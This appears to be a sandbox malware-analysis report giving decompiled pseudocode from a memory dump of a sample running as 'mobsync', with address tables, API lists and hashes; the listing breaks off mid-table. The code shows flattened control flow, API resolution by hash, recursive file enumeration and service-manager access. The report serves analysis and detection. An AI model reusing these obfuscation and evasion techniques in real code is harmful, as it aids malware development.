2c3b41-2c3b57 call 2c3f00 call 2c3e60 497->513 500->488 505 2c3965-2c396b 500->505 505->488 505->492 509->510 510->448 512->448 513->512
                                                                                C-Code - Quality: 63%
                                                                                			E002C38F0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				short _v524;
				char _v1044;
				short _v1588;
				intOrPtr _v1590;
				struct _WIN32_FIND_DATAW _v1636;
				void* _v1640;
				intOrPtr _v1652;
				void* __ebx;
				void* __ebp;
				void* _t22;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t33;
				signed int _t34;
				void* _t39;
				intOrPtr* _t42;
				signed int _t46;
				intOrPtr* _t50;
				intOrPtr _t55;
				void* _t56;
				void* _t91;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t98;

				_t91 = __ecx;
				_t95 = __edx;
				_v1640 = __ecx;
				_t22 = 0x25a25425;
				_t56 = _v1640;
				while(1) {
					L1:
					_t98 = _t22 - 0x25a25425;
					if(_t98 > 0) {
						break;
					}
					if(_t98 == 0) {
						_t22 = 0x29bc40d3;
						continue;
					} else {
						if(_t22 == 0x8a099c9) {
							if( *0x2ce430 == 0) {
								 *0x2ce430 = E002C3E60(_t56, E002C3F00(0x9bab0b12), 0x83efb111, _t95);
							}
							_t39 = FindFirstFileW( &_v524,  &_v1636); // executed
							_t56 = _t39;
							if(_t56 == 0xffffffff) {
								return _t39;
							} else {
								_t22 = 0x1a4f9837;
								continue;
							}
						} else {
							if(_t22 == 0xb46fa16) {
								_t42 =  *0x2cdba4;
								if(_t42 == 0) {
									_t42 = E002C3E60(_t56, E002C3F00(0x9bab0b12), 0xd274268a, _t95);
									 *0x2cdba4 = _t42;
								}
								return  *_t42(_t56);
							}
							if(_t22 != 0x1a4f9837) {
								L27:
								if(_t22 != 0x55fa1f4) {
									continue;
								} else {
									return _t22;
								}
							} else {
								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
									_t46 = _a4( &_v1636, _a8);
									asm("sbb eax, eax");
									_t22 = ( ~_t46 & 0x2b8487c8) + 0xb46fa16;
								} else {
									if(_v1636.cFileName != 0x2e) {
										L12:
										if(_t95 == 0) {
											goto L11;
										} else {
											_t94 = E002C34C0(0x2cd290);
											_t50 =  *0x2ce158;
											if(_t50 == 0) {
												_t50 = E002C3E60(_t56, E002C3F00(0xc6fbcd74), 0xba71dd03, _t95);
												 *0x2ce158 = _t50;
											}
											 *_t50( &_v1044, 0x104, _t94, _t91,  &(_v1636.cFileName));
											E002C38F0( &_v1044, _t95, _a4, _a8);
											_t96 = _t96 + 0x1c;
											E002C3460(_t94);
											_t22 = 0x36cb81de;
										}
									} else {
										_t55 = _v1590;
										if(_t55 == 0 || _t55 == 0x2e && _v1588 == 0) {
											L11:
											_t22 = 0x36cb81de;
										} else {
											goto L12;
										}
									}
								}
								continue;
							}
						}
					}
					L40:
				}
				if(_t22 == 0x29bc40d3) {
					_t93 = E002C34C0(0x2cd260);
					_t24 =  *0x2ce158;
					if(_t24 == 0) {
						_t24 = E002C3E60(_t56, E002C3F00(0xc6fbcd74), 0xba71dd03, _t95);
						 *0x2ce158 = _t24;
					}
					 *_t24( &_v524, 0x104, _t93, _t91);
					_t26 =  *0x2ce494;
					_t96 = _t96 + 0x10;
					if(_t26 == 0) {
						_t26 = E002C3E60(_t56, E002C3F00(0x9bab0b12), 0x7facde30, _t95);
						 *0x2ce494 = _t26;
					}
					_t92 =  *_t26();
					_t28 =  *0x2cdf30;
					if(_t28 == 0) {
						_t28 = E002C3E60(_t56, E002C3F00(0x9bab0b12), 0x5010a54d, _t95);
						 *0x2cdf30 = _t28;
					}
					 *_t28(_t92, 0, _t93);
					_t91 = _v1652;
					_t22 = 0x8a099c9;
					goto L1;
				} else {
					if(_t22 != 0x36cb81de) {
						goto L27;
					} else {
						_t33 =  *0x2cdf88;
						if(_t33 == 0) {
							_t33 = E002C3E60(_t56, E002C3F00(0x9bab0b12), 0xa53a5b1a, _t95);
							 *0x2cdf88 = _t33;
						}
						_t34 =  *_t33(_t56,  &_v1636);
						asm("sbb eax, eax");
						_t22 = ( ~_t34 & 0x0f089e21) + 0xb46fa16;
						goto L1;
					}
				}
				goto L40;
			}































                                                                                0x002c38fa
                                                                                0x002c38fc
                                                                                0x002c38fe
                                                                                0x002c3902
                                                                                0x002c3907
                                                                                0x002c3910
                                                                                0x002c3910
                                                                                0x002c3910
                                                                                0x002c3915
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002c391b
                                                                                0x002c3a5f
                                                                                0x00000000
                                                                                0x002c3921
                                                                                0x002c3926
                                                                                0x002c3a1e
                                                                                0x002c3a36
                                                                                0x002c3a36
                                                                                0x002c3a48
                                                                                0x002c3a4a
                                                                                0x002c3a4f
                                                                                0x002c3ba1
                                                                                0x002c3a55
                                                                                0x002c3a55
                                                                                0x00000000
                                                                                0x002c3a55
                                                                                0x002c392c
                                                                                0x002c3931
                                                                                0x002c3b70
                                                                                0x002c3b77
                                                                                0x002c3b8a
                                                                                0x002c3b8f
                                                                                0x002c3b8f
                                                                                0x00000000
                                                                                0x002c3b95
                                                                                0x002c393c
                                                                                0x002c3ab6
                                                                                0x002c3abb
                                                                                0x00000000
                                                                                0x002c3acb
                                                                                0x002c3acb
                                                                                0x002c3acb
                                                                                0x002c3942
                                                                                0x002c3947
                                                                                0x002c39fd
                                                                                0x002c3a06
                                                                                0x002c3a0d
                                                                                0x002c394d
                                                                                0x002c3953
                                                                                0x002c3974
                                                                                0x002c3976
                                                                                0x00000000
                                                                                0x002c3978
                                                                                0x002c3982
                                                                                0x002c3984
                                                                                0x002c398b
                                                                                0x002c399e
                                                                                0x002c39a3
                                                                                0x002c39a3
                                                                                0x002c39bc
                                                                                0x002c39d8
                                                                                0x002c39dd
                                                                                0x002c39e2
                                                                                0x002c39e7
                                                                                0x002c39e7
                                                                                0x002c3955
                                                                                0x002c3955
                                                                                0x002c395d
                                                                                0x002c396d
                                                                                0x002c396d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002c395d
                                                                                0x002c3953
                                                                                0x00000000
                                                                                0x002c3947
                                                                                0x002c393c
                                                                                0x002c3926
                                                                                0x00000000
                                                                                0x002c391b
                                                                                0x002c3a6e
                                                                                0x002c3ad6
                                                                                0x002c3ad8
                                                                                0x002c3adf
                                                                                0x002c3af2
                                                                                0x002c3af7
                                                                                0x002c3af7
                                                                                0x002c3b0b
                                                                                0x002c3b0d
                                                                                0x002c3b12
                                                                                0x002c3b17
                                                                                0x002c3b2a
                                                                                0x002c3b2f
                                                                                0x002c3b2f
                                                                                0x002c3b36
                                                                                0x002c3b38
                                                                                0x002c3b3f
                                                                                0x002c3b52
                                                                                0x002c3b57
                                                                                0x002c3b57
                                                                                0x002c3b60
                                                                                0x002c3b62
                                                                                0x002c3b66
                                                                                0x00000000
                                                                                0x002c3a70
                                                                                0x002c3a75
                                                                                0x00000000
                                                                                0x002c3a77
                                                                                0x002c3a77
                                                                                0x002c3a7e
                                                                                0x002c3a91
                                                                                0x002c3a96
                                                                                0x002c3a96
                                                                                0x002c3aa1
                                                                                0x002c3aa5
                                                                                0x002c3aac
                                                                                0x00000000
                                                                                0x002c3aac
                                                                                0x002c3a75
                                                                                0x00000000

                                                                                APIs
                                                                                • FindFirstFileW.KERNELBASE(?,?), ref: 002C3A48
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2300986069.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                                                                • Associated: 0000000C.00000002.2300951864.00000000002C0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000C.00000002.2301020512.00000000002CD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000C.00000002.2301054781.00000000002CF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2c0000_mobsync.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFindFirst
                                                                                • String ID: .
                                                                                • API String ID: 1974802433-248832578
                                                                                • Opcode ID: 64805b42758a8c62d03dddd0e338148ec99c7d98ad96c5f52ab6bb6c3b8f22ac
                                                                                • Instruction ID: 37b38d0884e596c7b43d3e9cad13d581c848bf8a2176448c3b9e97939a522065
                                                                                • Opcode Fuzzy Hash: 64805b42758a8c62d03dddd0e338148ec99c7d98ad96c5f52ab6bb6c3b8f22ac
                                                                                • Instruction Fuzzy Hash: F351E1716342064BCA24EF68AC45FAB76A69BA0704F108F2DF445C7352EA76CF358792
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002C5040, Relevance: 1.7, APIs: 1, Instructions: 248memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 61%
                                                                                			E002C5040(intOrPtr __ecx, intOrPtr __edx) {
				char _v4;
				char _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				void* _v36;
				intOrPtr _v44;
				signed int _v52;
				void* _v68;
				void* __ebx;
				void* __ebp;
				void* _t16;
				void* _t17;
				void* _t23;
				void* _t26;
				void* _t29;
				void* _t31;
				void* _t35;
				void* _t37;
				void* _t41;
				void* _t42;
				void* _t45;
				void* _t50;
				void* _t51;
				void* _t52;
				signed int _t53;
				void* _t58;
				intOrPtr* _t101;
				void* _t103;
				signed int _t104;
				void* _t105;
				void* _t107;
				void* _t108;
				void* _t112;
				void* _t115;
				void* _t116;

				_t101 = _v12;
				_t58 = 0;
				_v16 = __edx;
				_t112 = 0;
				_v20 = __ecx;
				_t104 = 0x1ca940c1;
				while(1) {
					_t16 = _v28;
					while(1) {
						L2:
						_t115 = _t104 - 0x12f72f95;
						if(_t115 <= 0) {
							break;
						}
						__eflags = _t104 - 0x26342ffd;
						if(__eflags > 0) {
							__eflags = _t104 - 0x2fab56c4;
							if(_t104 != 0x2fab56c4) {
								goto L40;
							} else {
								_t17 =  *0x2ce494;
								__eflags = _t17;
								if(_t17 == 0) {
									_t17 = E002C3E60(_t58, E002C3F00(0x9bab0b12), 0x7facde30, _t112);
									 *0x2ce494 = _t17;
								}
								_t105 =  *_t17();
								__eflags =  *0x2cdd18;
								if( *0x2cdd18 == 0) {
									 *0x2cdd18 = E002C3E60(_t58, E002C3F00(0x9bab0b12), 0x9ff0609c, _t112);
								}
								_t16 = RtlAllocateHeap(_t105, 8, 0x20000); // executed
								_t58 = _t16;
								__eflags = _t58;
								if(_t58 != 0) {
									_t104 = 0x8956eec;
									while(1) {
										_t16 = _v28;
										goto L2;
									}
								}
							}
						} else {
							if(__eflags == 0) {
								_t23 =  *0x2ce484;
								__eflags = _t23;
								if(_t23 == 0) {
									_t23 = E002C3E60(_t58, E002C3F00(0x26f5757c), 0x9e91db81, _t112);
									 *0x2ce484 = _t23;
								}
								 *_t23(_v24, 1, _t112, 0x2000,  &_v4);
								asm("sbb esi, esi");
								_t26 =  *0x2ce18c;
								_t104 = (_t104 & 0x0b23632b) + 0x5d498c4;
								__eflags = _t26;
								if(_t26 == 0) {
									_t26 = E002C3E60(_t58, E002C3F00(0x26f5757c), 0x268fe5f0, _t112);
									 *0x2ce18c = _t26;
								}
								_t16 =  *_t26(_v44);
								goto L40;
							} else {
								__eflags = _t104 - 0x1ca940c1;
								if(_t104 == 0x1ca940c1) {
									_t104 = 0x2fab56c4;
									continue;
								} else {
									__eflags = _t104 - 0x254bd927;
									if(_t104 != 0x254bd927) {
										L40:
										__eflags = _t104 - 0x1f0f293e;
										if(_t104 != 0x1f0f293e) {
											while(1) {
												_t16 = _v28;
												goto L2;
											}
										}
									} else {
										_t50 =  *0x2ce29c;
										__eflags = _t50;
										if(_t50 == 0) {
											_t50 = E002C3E60(_t58, E002C3F00(0x26f5757c), 0x4574c66, _t112);
											 *0x2ce29c = _t50;
										}
										_t51 =  *_t50(_v20, 0, 0x30, 3, _t58, 0x20000,  &_v8,  &_v12, 0, 0);
										__eflags = _t51;
										if(_t51 == 0) {
											L13:
											_t104 = 0x11e09e52;
											while(1) {
												_t16 = _v28;
												goto L2;
											}
										} else {
											_t52 =  *0x2cde08;
											__eflags = _t52;
											if(_t52 == 0) {
												_t52 = E002C3E60(_t58, E002C3F00(0x9bab0b12), 0xd8ef4c49, _t112);
												 *0x2cde08 = _t52;
											}
											_t53 =  *_t52();
											_t104 = 0x128dff18;
											_t103 = _t58 + (_t53 & 0x0000001f) * 0x2c;
											_t16 = _t58 + _v52 * 0x2c;
											__eflags = _t103 - _t16;
											_v68 = _t16;
											_t101 =  >=  ? _t58 : _t103;
											continue;
										}
										L55:
									}
								}
							}
						}
						L54:
						return _t16;
						goto L55;
					}
					if(_t115 == 0) {
						_t29 =  *0x2ce494;
						__eflags = _t29;
						if(_t29 == 0) {
							_t29 = E002C3E60(_t58, E002C3F00(0x9bab0b12), 0x7facde30, _t112);
							 *0x2ce494 = _t29;
						}
						_t107 =  *_t29();
						_t31 =  *0x2cdf30;
						__eflags = _t31;
						if(_t31 == 0) {
							_t31 = E002C3E60(_t58, E002C3F00(0x9bab0b12), 0x5010a54d, _t112);
							 *0x2cdf30 = _t31;
						}
						return  *_t31(_t107, 0, _t58);
					}
					_t116 = _t104 - 0x10f7fbef;
					if(_t116 > 0) {
						__eflags = _t104 - 0x11e09e52;
						if(_t104 == 0x11e09e52) {
							_t35 =  *0x2ce494;
							__eflags = _t35;
							if(_t35 == 0) {
								_t35 = E002C3E60(_t58, E002C3F00(0x9bab0b12), 0x7facde30, _t112);
								 *0x2ce494 = _t35;
							}
							_t108 =  *_t35();
							_t37 =  *0x2cdf30;
							__eflags = _t37;
							if(_t37 == 0) {
								_t37 = E002C3E60(_t58, E002C3F00(0x9bab0b12), 0x5010a54d, _t112);
								 *0x2cdf30 = _t37;
							}
							 *_t37(_t108, 0, _t112);
							_t104 = 0x12f72f95;
							continue;
						} else {
							__eflags = _t104 - 0x128dff18;
							if(_t104 != 0x128dff18) {
								goto L40;
							} else {
								_t41 =  *0x2ce270;
								__eflags = _t41;
								if(_t41 == 0) {
									_t41 = E002C3E60(_t58, E002C3F00(0x26f5757c), 0x56e230f9, _t112);
									 *0x2ce270 = _t41;
								}
								_t42 =  *_t41(_v20,  *_t101, 1);
								__eflags = _t42;
								_v36 = _t42;
								_t104 =  !=  ? 0x26342ffd : 0x5d498c4;
								while(1) {
									_t16 = _v28;
									goto L2;
								}
							}
						}
					} else {
						if(_t116 == 0) {
							_t45 =  *0x2ce200;
							__eflags = _t45;
							if(_t45 == 0) {
								_t45 = E002C3E60(_t58, E002C3F00(0x26f5757c), 0x16d40839, _t112);
								 *0x2ce200 = _t45;
							}
							 *_t45(_v16, 1, _t112);
							goto L13;
						} else {
							if(_t104 == 0x5d498c4) {
								_t101 = _t101 + 0x2c;
								__eflags = _t101 - _t16;
								asm("sbb esi, esi");
								_t104 = (_t104 & 0x00ad60c6) + 0x11e09e52;
								goto L2;
							} else {
								if(_t104 != 0x8956eec) {
									goto L40;
								} else {
									_t112 = E002C42C0(_t58, 0x2000);
									_t104 =  !=  ? 0x254bd927 : 0x12f72f95;
									while(1) {
										_t16 = _v28;
										goto L2;
									}
								}
							}
						}
					}
					goto L54;
				}
			}









































                                                                                0x002c5047
                                                                                0x002c504b
                                                                                0x002c504d
                                                                                0x002c5051
                                                                                0x002c5053
                                                                                0x002c5057
                                                                                0x002c505c
                                                                                0x002c505c
                                                                                0x002c5060
                                                                                0x002c5060
                                                                                0x002c5060
                                                                                0x002c5066
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002c51af
                                                                                0x002c51b5
                                                                                0x002c52f9
                                                                                0x002c52ff
                                                                                0x00000000
                                                                                0x002c5301
                                                                                0x002c5301
                                                                                0x002c5306
                                                                                0x002c5308
                                                                                0x002c531b
                                                                                0x002c5320
                                                                                0x002c5320
                                                                                0x002c5327
                                                                                0x002c532e
                                                                                0x002c5330
                                                                                0x002c5348
                                                                                0x002c5348
                                                                                0x002c5355
                                                                                0x002c5357
                                                                                0x002c5359
                                                                                0x002c535b
                                                                                0x002c535d
                                                                                0x002c505c
                                                                                0x002c505c
                                                                                0x00000000
                                                                                0x002c505c
                                                                                0x002c505c
                                                                                0x002c535b
                                                                                0x002c51bb
                                                                                0x002c51bb
                                                                                0x002c5277
                                                                                0x002c527c
                                                                                0x002c527e
                                                                                0x002c5291
                                                                                0x002c5296
                                                                                0x002c5296
                                                                                0x002c52ac
                                                                                0x002c52b0
                                                                                0x002c52b2
                                                                                0x002c52bd
                                                                                0x002c52c3
                                                                                0x002c52c5
                                                                                0x002c52d8
                                                                                0x002c52dd
                                                                                0x002c52dd
                                                                                0x002c52e6
                                                                                0x00000000
                                                                                0x002c51c1
                                                                                0x002c51c1
                                                                                0x002c51c7
                                                                                0x002c526d
                                                                                0x00000000
                                                                                0x002c51cd
                                                                                0x002c51cd
                                                                                0x002c51d3
                                                                                0x002c52e8
                                                                                0x002c52e8
                                                                                0x002c52ee
                                                                                0x002c505c
                                                                                0x002c505c
                                                                                0x00000000
                                                                                0x002c505c
                                                                                0x002c505c
                                                                                0x002c51d9
                                                                                0x002c51d9
                                                                                0x002c51de
                                                                                0x002c51e0
                                                                                0x002c51f3
                                                                                0x002c51f8
                                                                                0x002c51f8
                                                                                0x002c521b
                                                                                0x002c521d
                                                                                0x002c521f
                                                                                0x002c50ef
                                                                                0x002c50ef
                                                                                0x002c505c
                                                                                0x002c505c
                                                                                0x00000000
                                                                                0x002c505c
                                                                                0x002c5225
                                                                                0x002c5225
                                                                                0x002c522a
                                                                                0x002c522c
                                                                                0x002c523f
                                                                                0x002c5244
                                                                                0x002c5244
                                                                                0x002c5249
                                                                                0x002c524e
                                                                                0x002c525b
                                                                                0x002c525d
                                                                                0x002c525f
                                                                                0x002c5261
                                                                                0x002c5265
                                                                                0x00000000
                                                                                0x002c5265
                                                                                0x00000000
                                                                                0x002c521f
                                                                                0x002c51d3
                                                                                0x002c51c7
                                                                                0x002c51bb
                                                                                0x002c53c0
                                                                                0x002c53c0
                                                                                0x00000000
                                                                                0x002c53c0
                                                                                0x002c506c
                                                                                0x002c5367
                                                                                0x002c536c
                                                                                0x002c536e
                                                                                0x002c5381
                                                                                0x002c5386
                                                                                0x002c5386
                                                                                0x002c538d
                                                                                0x002c538f
                                                                                0x002c5394
                                                                                0x002c5396
                                                                                0x002c53a9
                                                                                0x002c53ae
                                                                                0x002c53ae
                                                                                0x00000000
                                                                                0x002c53b7
                                                                                0x002c5072
                                                                                0x002c5078
                                                                                0x002c50f9
                                                                                0x002c50ff
                                                                                0x002c5153
                                                                                0x002c5158
                                                                                0x002c515a
                                                                                0x002c516d
                                                                                0x002c5172
                                                                                0x002c5172
                                                                                0x002c5179
                                                                                0x002c517b
                                                                                0x002c5180
                                                                                0x002c5182
                                                                                0x002c5195
                                                                                0x002c519a
                                                                                0x002c519a
                                                                                0x002c51a3
                                                                                0x002c51a5
                                                                                0x00000000
                                                                                0x002c5101
                                                                                0x002c5101
                                                                                0x002c5107
                                                                                0x00000000
                                                                                0x002c510d
                                                                                0x002c510d
                                                                                0x002c5112
                                                                                0x002c5114
                                                                                0x002c5127
                                                                                0x002c512c
                                                                                0x002c512c
                                                                                0x002c5139
                                                                                0x002c513b
                                                                                0x002c513d
                                                                                0x002c514b
                                                                                0x002c505c
                                                                                0x002c505c
                                                                                0x00000000
                                                                                0x002c505c
                                                                                0x002c505c
                                                                                0x002c5107
                                                                                0x002c507a
                                                                                0x002c507a
                                                                                0x002c50c2
                                                                                0x002c50c7
                                                                                0x002c50c9
                                                                                0x002c50dc
                                                                                0x002c50e1
                                                                                0x002c50e1
                                                                                0x002c50ed
                                                                                0x00000000
                                                                                0x002c507c
                                                                                0x002c5082
                                                                                0x002c50ad
                                                                                0x002c50b0
                                                                                0x002c50b2
                                                                                0x002c50ba
                                                                                0x00000000
                                                                                0x002c5084
                                                                                0x002c508a
                                                                                0x00000000
                                                                                0x002c5090
                                                                                0x002c509a
                                                                                0x002c50a8
                                                                                0x002c505c
                                                                                0x002c505c
                                                                                0x00000000
                                                                                0x002c505c
                                                                                0x002c505c
                                                                                0x002c508a
                                                                                0x002c5082
                                                                                0x002c507a
                                                                                0x00000000
                                                                                0x002c5078

                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000008,00020000,?,?,002C8AC8,?,3251FEFE,?,?), ref: 002C5355
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.2300986069.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                                                                • Associated: 0000000C.00000002.2300951864.00000000002C0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000C.00000002.2301020512.00000000002CD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000C.00000002.2301054781.00000000002CF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_2c0000_mobsync.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: be50fa741a32b8b082ba0b4438d28272ba4baf65636c8e2ef25947048336740a
                                                                                • Instruction ID: 399b2133a7b0f1eb483776de0f1ba7a6d2fcb54fe8b384e90d3a198d855b80ae
                                                                                • Opcode Fuzzy Hash: be50fa741a32b8b082ba0b4438d28272ba4baf65636c8e2ef25947048336740a
                                                                                • Instruction Fuzzy Hash: AA814B31B307254BDF24EF789C45F6A36EAABA4740F414A2DF805DB251EA70ED604BC2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002C9860, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 195serviceCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                C-Code - Quality: 73%
                                                                                			E002C9860() {
				char _v524;
				unsigned int _v528;
				char _v536;
				void* _v544;
				void* __ebx;
				void* __ebp;
				void* _t28;
				void* _t29;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				void* _t47;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t62;
				void* _t64;
				void* _t69;
				void* _t72;
				void* _t92;
				void* _t93;
				intOrPtr _t94;
				void* _t97;
				void* _t98;

				_t64 = 0;
				_t28 = 0x29f9e503;
				_t92 = _v528;
				_t2 = _t64 + 1; // 0x1
				_t94 = _t2;
				goto L1;
				do {
					while(1) {
						L1:
						_t97 = _t28 - 0x13fee53b;
						if(_t97 > 0) {
							break;
						}
						if(_t97 == 0) {
							__eflags =  *0x2ce310;
							if( *0x2ce310 == 0) {
								 *0x2ce310 = E002C3E60(_t64, E002C3F00(0x26f5757c), 0x9ba7cd1, _t94);
							}
							_t49 = OpenSCManagerW(0, 0, 0xf003f); // executed
							_t92 = _t49;
							__eflags = _t92;
							if(_t92 == 0) {
								_t28 = 0x23c48583;
							} else {
								_t50 =  *0x2ce54c; // 0x5de048
								 *((intOrPtr*)(_t50 + 0x220)) = _t94;
								_t28 = 0xc471eb;
							}
							continue;
						} else {
							_t98 = _t28 - 0x9835f84;
							if(_t98 > 0) {
								__eflags = _t28 - 0xc0f0991;
								if(_t28 != 0xc0f0991) {
									goto L36;
								} else {
									_t69 =  *0x2cdbd8;
									__eflags = _t69;
									if(_t69 == 0) {
										_t69 = E002C3E60(_t64, E002C3F00(0xd9518805), 0x141622d6, _t94);
										 *0x2cdbd8 = _t69;
									}
									_t53 =  *0x2ce54c; // 0x5de048
									_t56 =  *_t69(0, _v528, 0, 0, _t53 + 0x18); // executed
									__eflags = _t56;
									_t28 = 0x9835f84;
									_t64 =  ==  ? _t94 : _t64;
									continue;
								}
							} else {
								if(_t98 == 0) {
									E002C7C60(_t94);
									_t28 = 0x6addd5c;
									continue;
								} else {
									if(_t28 == 0xc471eb) {
										_v528 = 0xc1a3;
										_t28 = 0x179ed98e;
										_v528 = _v528 + 0xffff1ad7;
										_v528 = _v528 ^ 0xffffdc53;
										continue;
									} else {
										if(_t28 != 0x6addd5c) {
											goto L36;
										} else {
											_t60 =  *0x2ce3f4;
											if(_t60 == 0) {
												_t60 = E002C3E60(_t64, E002C3F00(0x9bab0b12), 0x7dc9b9bb, _t94);
												 *0x2ce3f4 = _t60;
											}
											 *_t60(0,  &_v524, 0x104);
											_t62 = E002C3D00( &_v536);
											_t72 =  *0x2ce54c; // 0x5de048
											 *((intOrPtr*)(_t72 + 0x46c)) = _t62;
											_t28 = 0x39ea8110;
											continue;
										}
									}
								}
							}
						}
						L42:
					}
					__eflags = _t28 - 0x29f9e503;
					if(__eflags > 0) {
						__eflags = _t28 - 0x39ea8110;
						if(_t28 == 0x39ea8110) {
							_t29 =  *0x2cdbd8;
							__eflags = _t29;
							if(_t29 == 0) {
								_t29 = E002C3E60(_t64, E002C3F00(0xd9518805), 0x141622d6, _t94);
								 *0x2cdbd8 = _t29;
							}
							 *_t29(0, 0x25, 0, 0,  &_v524);
							_t31 =  *0x2ce54c; // 0x5de048
							_t32 = _t31 + 0x234;
							__eflags = _t31 + 0x234;
							E002C3040(_t32);
							goto L41;
						} else {
							goto L36;
						}
					} else {
						if(__eflags == 0) {
							_t37 =  *0x2ce494;
							__eflags = _t37;
							if(_t37 == 0) {
								_t37 = E002C3E60(_t64, E002C3F00(0x9bab0b12), 0x7facde30, _t94);
								 *0x2ce494 = _t37;
							}
							_t93 =  *_t37();
							_t39 =  *0x2cdd18;
							__eflags = _t39;
							if(_t39 == 0) {
								_t39 = E002C3E60(_t64, E002C3F00(0x9bab0b12), 0x9ff0609c, _t94);
								 *0x2cdd18 = _t39;
							}
							_t40 =  *_t39(_t93, 8, 0x480);
							 *0x2ce54c = _t40;
							__eflags = _t40;
							if(_t40 == 0) {
								L41:
								return _t64;
							} else {
								 *((intOrPtr*)(_t40 + 4)) = E002C7E40;
								_t28 = 0x13fee53b;
								goto L1;
							}
						} else {
							__eflags = _t28 - 0x179ed98e;
							if(_t28 == 0x179ed98e) {
								__eflags =  *0x2ce18c;
								if( *0x2ce18c == 0) {
									 *0x2ce18c = E002C3E60(_t64, E002C3F00(0x26f5757c), 0x268fe5f0, _t94);
								}
								CloseServiceHandle(_t92); // executed
								_t28 = 0xc0f0991;
								goto L1;
							} else {
								__eflags = _t28 - 0x23c48583;
								if(_t28 != 0x23c48583) {
									goto L36;
								} else {
									_v528 = 0x5332;
									_v528 = _v528 << 6;
									_v528 = _v528 >> 0xf;
									_v528 = _v528 + 0xffffb18f;
									_v528 = _v528 >> 3;
									_v528 = _v528 ^ 0x1ffff62b;
									_t47 =  *0x2ce54c; // 0x5de048
									 *((intOrPtr*)(_t47 + 8)) = 0x2c7e30;
									_t28 = 0xc0f0991;
									goto L1;
								}
							}
						}
					}
					goto L42;
					L36:
					__eflags = _t28 - 0x305b3459;
				} while (_t28 != 0x305b3459);
				return _t64;
				goto L42;
			}






























                                                                                0x002c9868
                                                                                0x002c986a
                                                                                0x002c9871
                                                                                0x002c9875
                                                                                0x002c9875
                                                                                0x002c9878
                                                                                0x002c9880
                                                                                0x002c9880
                                                                                0x002c9880
                                                                                0x002c9880
                                                                                0x002c9885
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002c988b
                                                                                0x002c9993
                                                                                0x002c9995
                                                                                0x002c99ad
                                                                                0x002c99ad
                                                                                0x002c99bb
                                                                                0x002c99bd
                                                                                0x002c99bf
                                                                                0x002c99c1
                                                                                0x002c99d8
                                                                                0x002c99c3
                                                                                0x002c99c3
                                                                                0x002c99c8
                                                                                0x002c99ce
                                                                                0x002c99ce
                                                                                0x00000000
                                                                                0x002c9891
                                                                                0x002c9891
                                                                                0x002c9896
                                                                                0x002c9936
                                                                                0x002c993b
                                                                                0x00000000
                                                                                0x002c9941
                                                                                0x002c9941
                                                                                0x002c9947
                                                                                0x002c9949
                                                                                0x002c9961
                                                                                0x002c9963
                                                                                0x002c9963
                                                                                0x002c9969
                                                                                0x002c997d
                                                                                0x002c997f
                                                                                0x002c9981
                                                                                0x002c9986
                                                                                0x00000000
                                                                                0x002c9986
                                                                                0x002c989c
                                                                                0x002c989c
                                                                                0x002c9927
                                                                                0x002c992c
                                                                                0x00000000
                                                                                0x002c98a2
                                                                                0x002c98a7
                                                                                0x002c9905
                                                                                0x002c990d
                                                                                0x002c9912
                                                                                0x002c991a
                                                                                0x00000000
                                                                                0x002c98a9
                                                                                0x002c98ae
                                                                                0x00000000
                                                                                0x002c98b4
                                                                                0x002c98b4
                                                                                0x002c98bb
                                                                                0x002c98ce
                                                                                0x002c98d3
                                                                                0x002c98d3
                                                                                0x002c98e4
                                                                                0x002c98ea
                                                                                0x002c98ef
                                                                                0x002c98f5
                                                                                0x002c98fb
                                                                                0x00000000
                                                                                0x002c98fb
                                                                                0x002c98ae
                                                                                0x002c98a7
                                                                                0x002c989c
                                                                                0x002c9896
                                                                                0x00000000
                                                                                0x002c988b
                                                                                0x002c99e2
                                                                                0x002c99e7
                                                                                0x002c9ae3
                                                                                0x002c9ae8
                                                                                0x002c9b02
                                                                                0x002c9b07
                                                                                0x002c9b09
                                                                                0x002c9b1c
                                                                                0x002c9b21
                                                                                0x002c9b21
                                                                                0x002c9b33
                                                                                0x002c9b35
                                                                                0x002c9b3e
                                                                                0x002c9b3e
                                                                                0x002c9b44
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002c99ed
                                                                                0x002c99ed
                                                                                0x002c9a73
                                                                                0x002c9a78
                                                                                0x002c9a7a
                                                                                0x002c9a8d
                                                                                0x002c9a92
                                                                                0x002c9a92
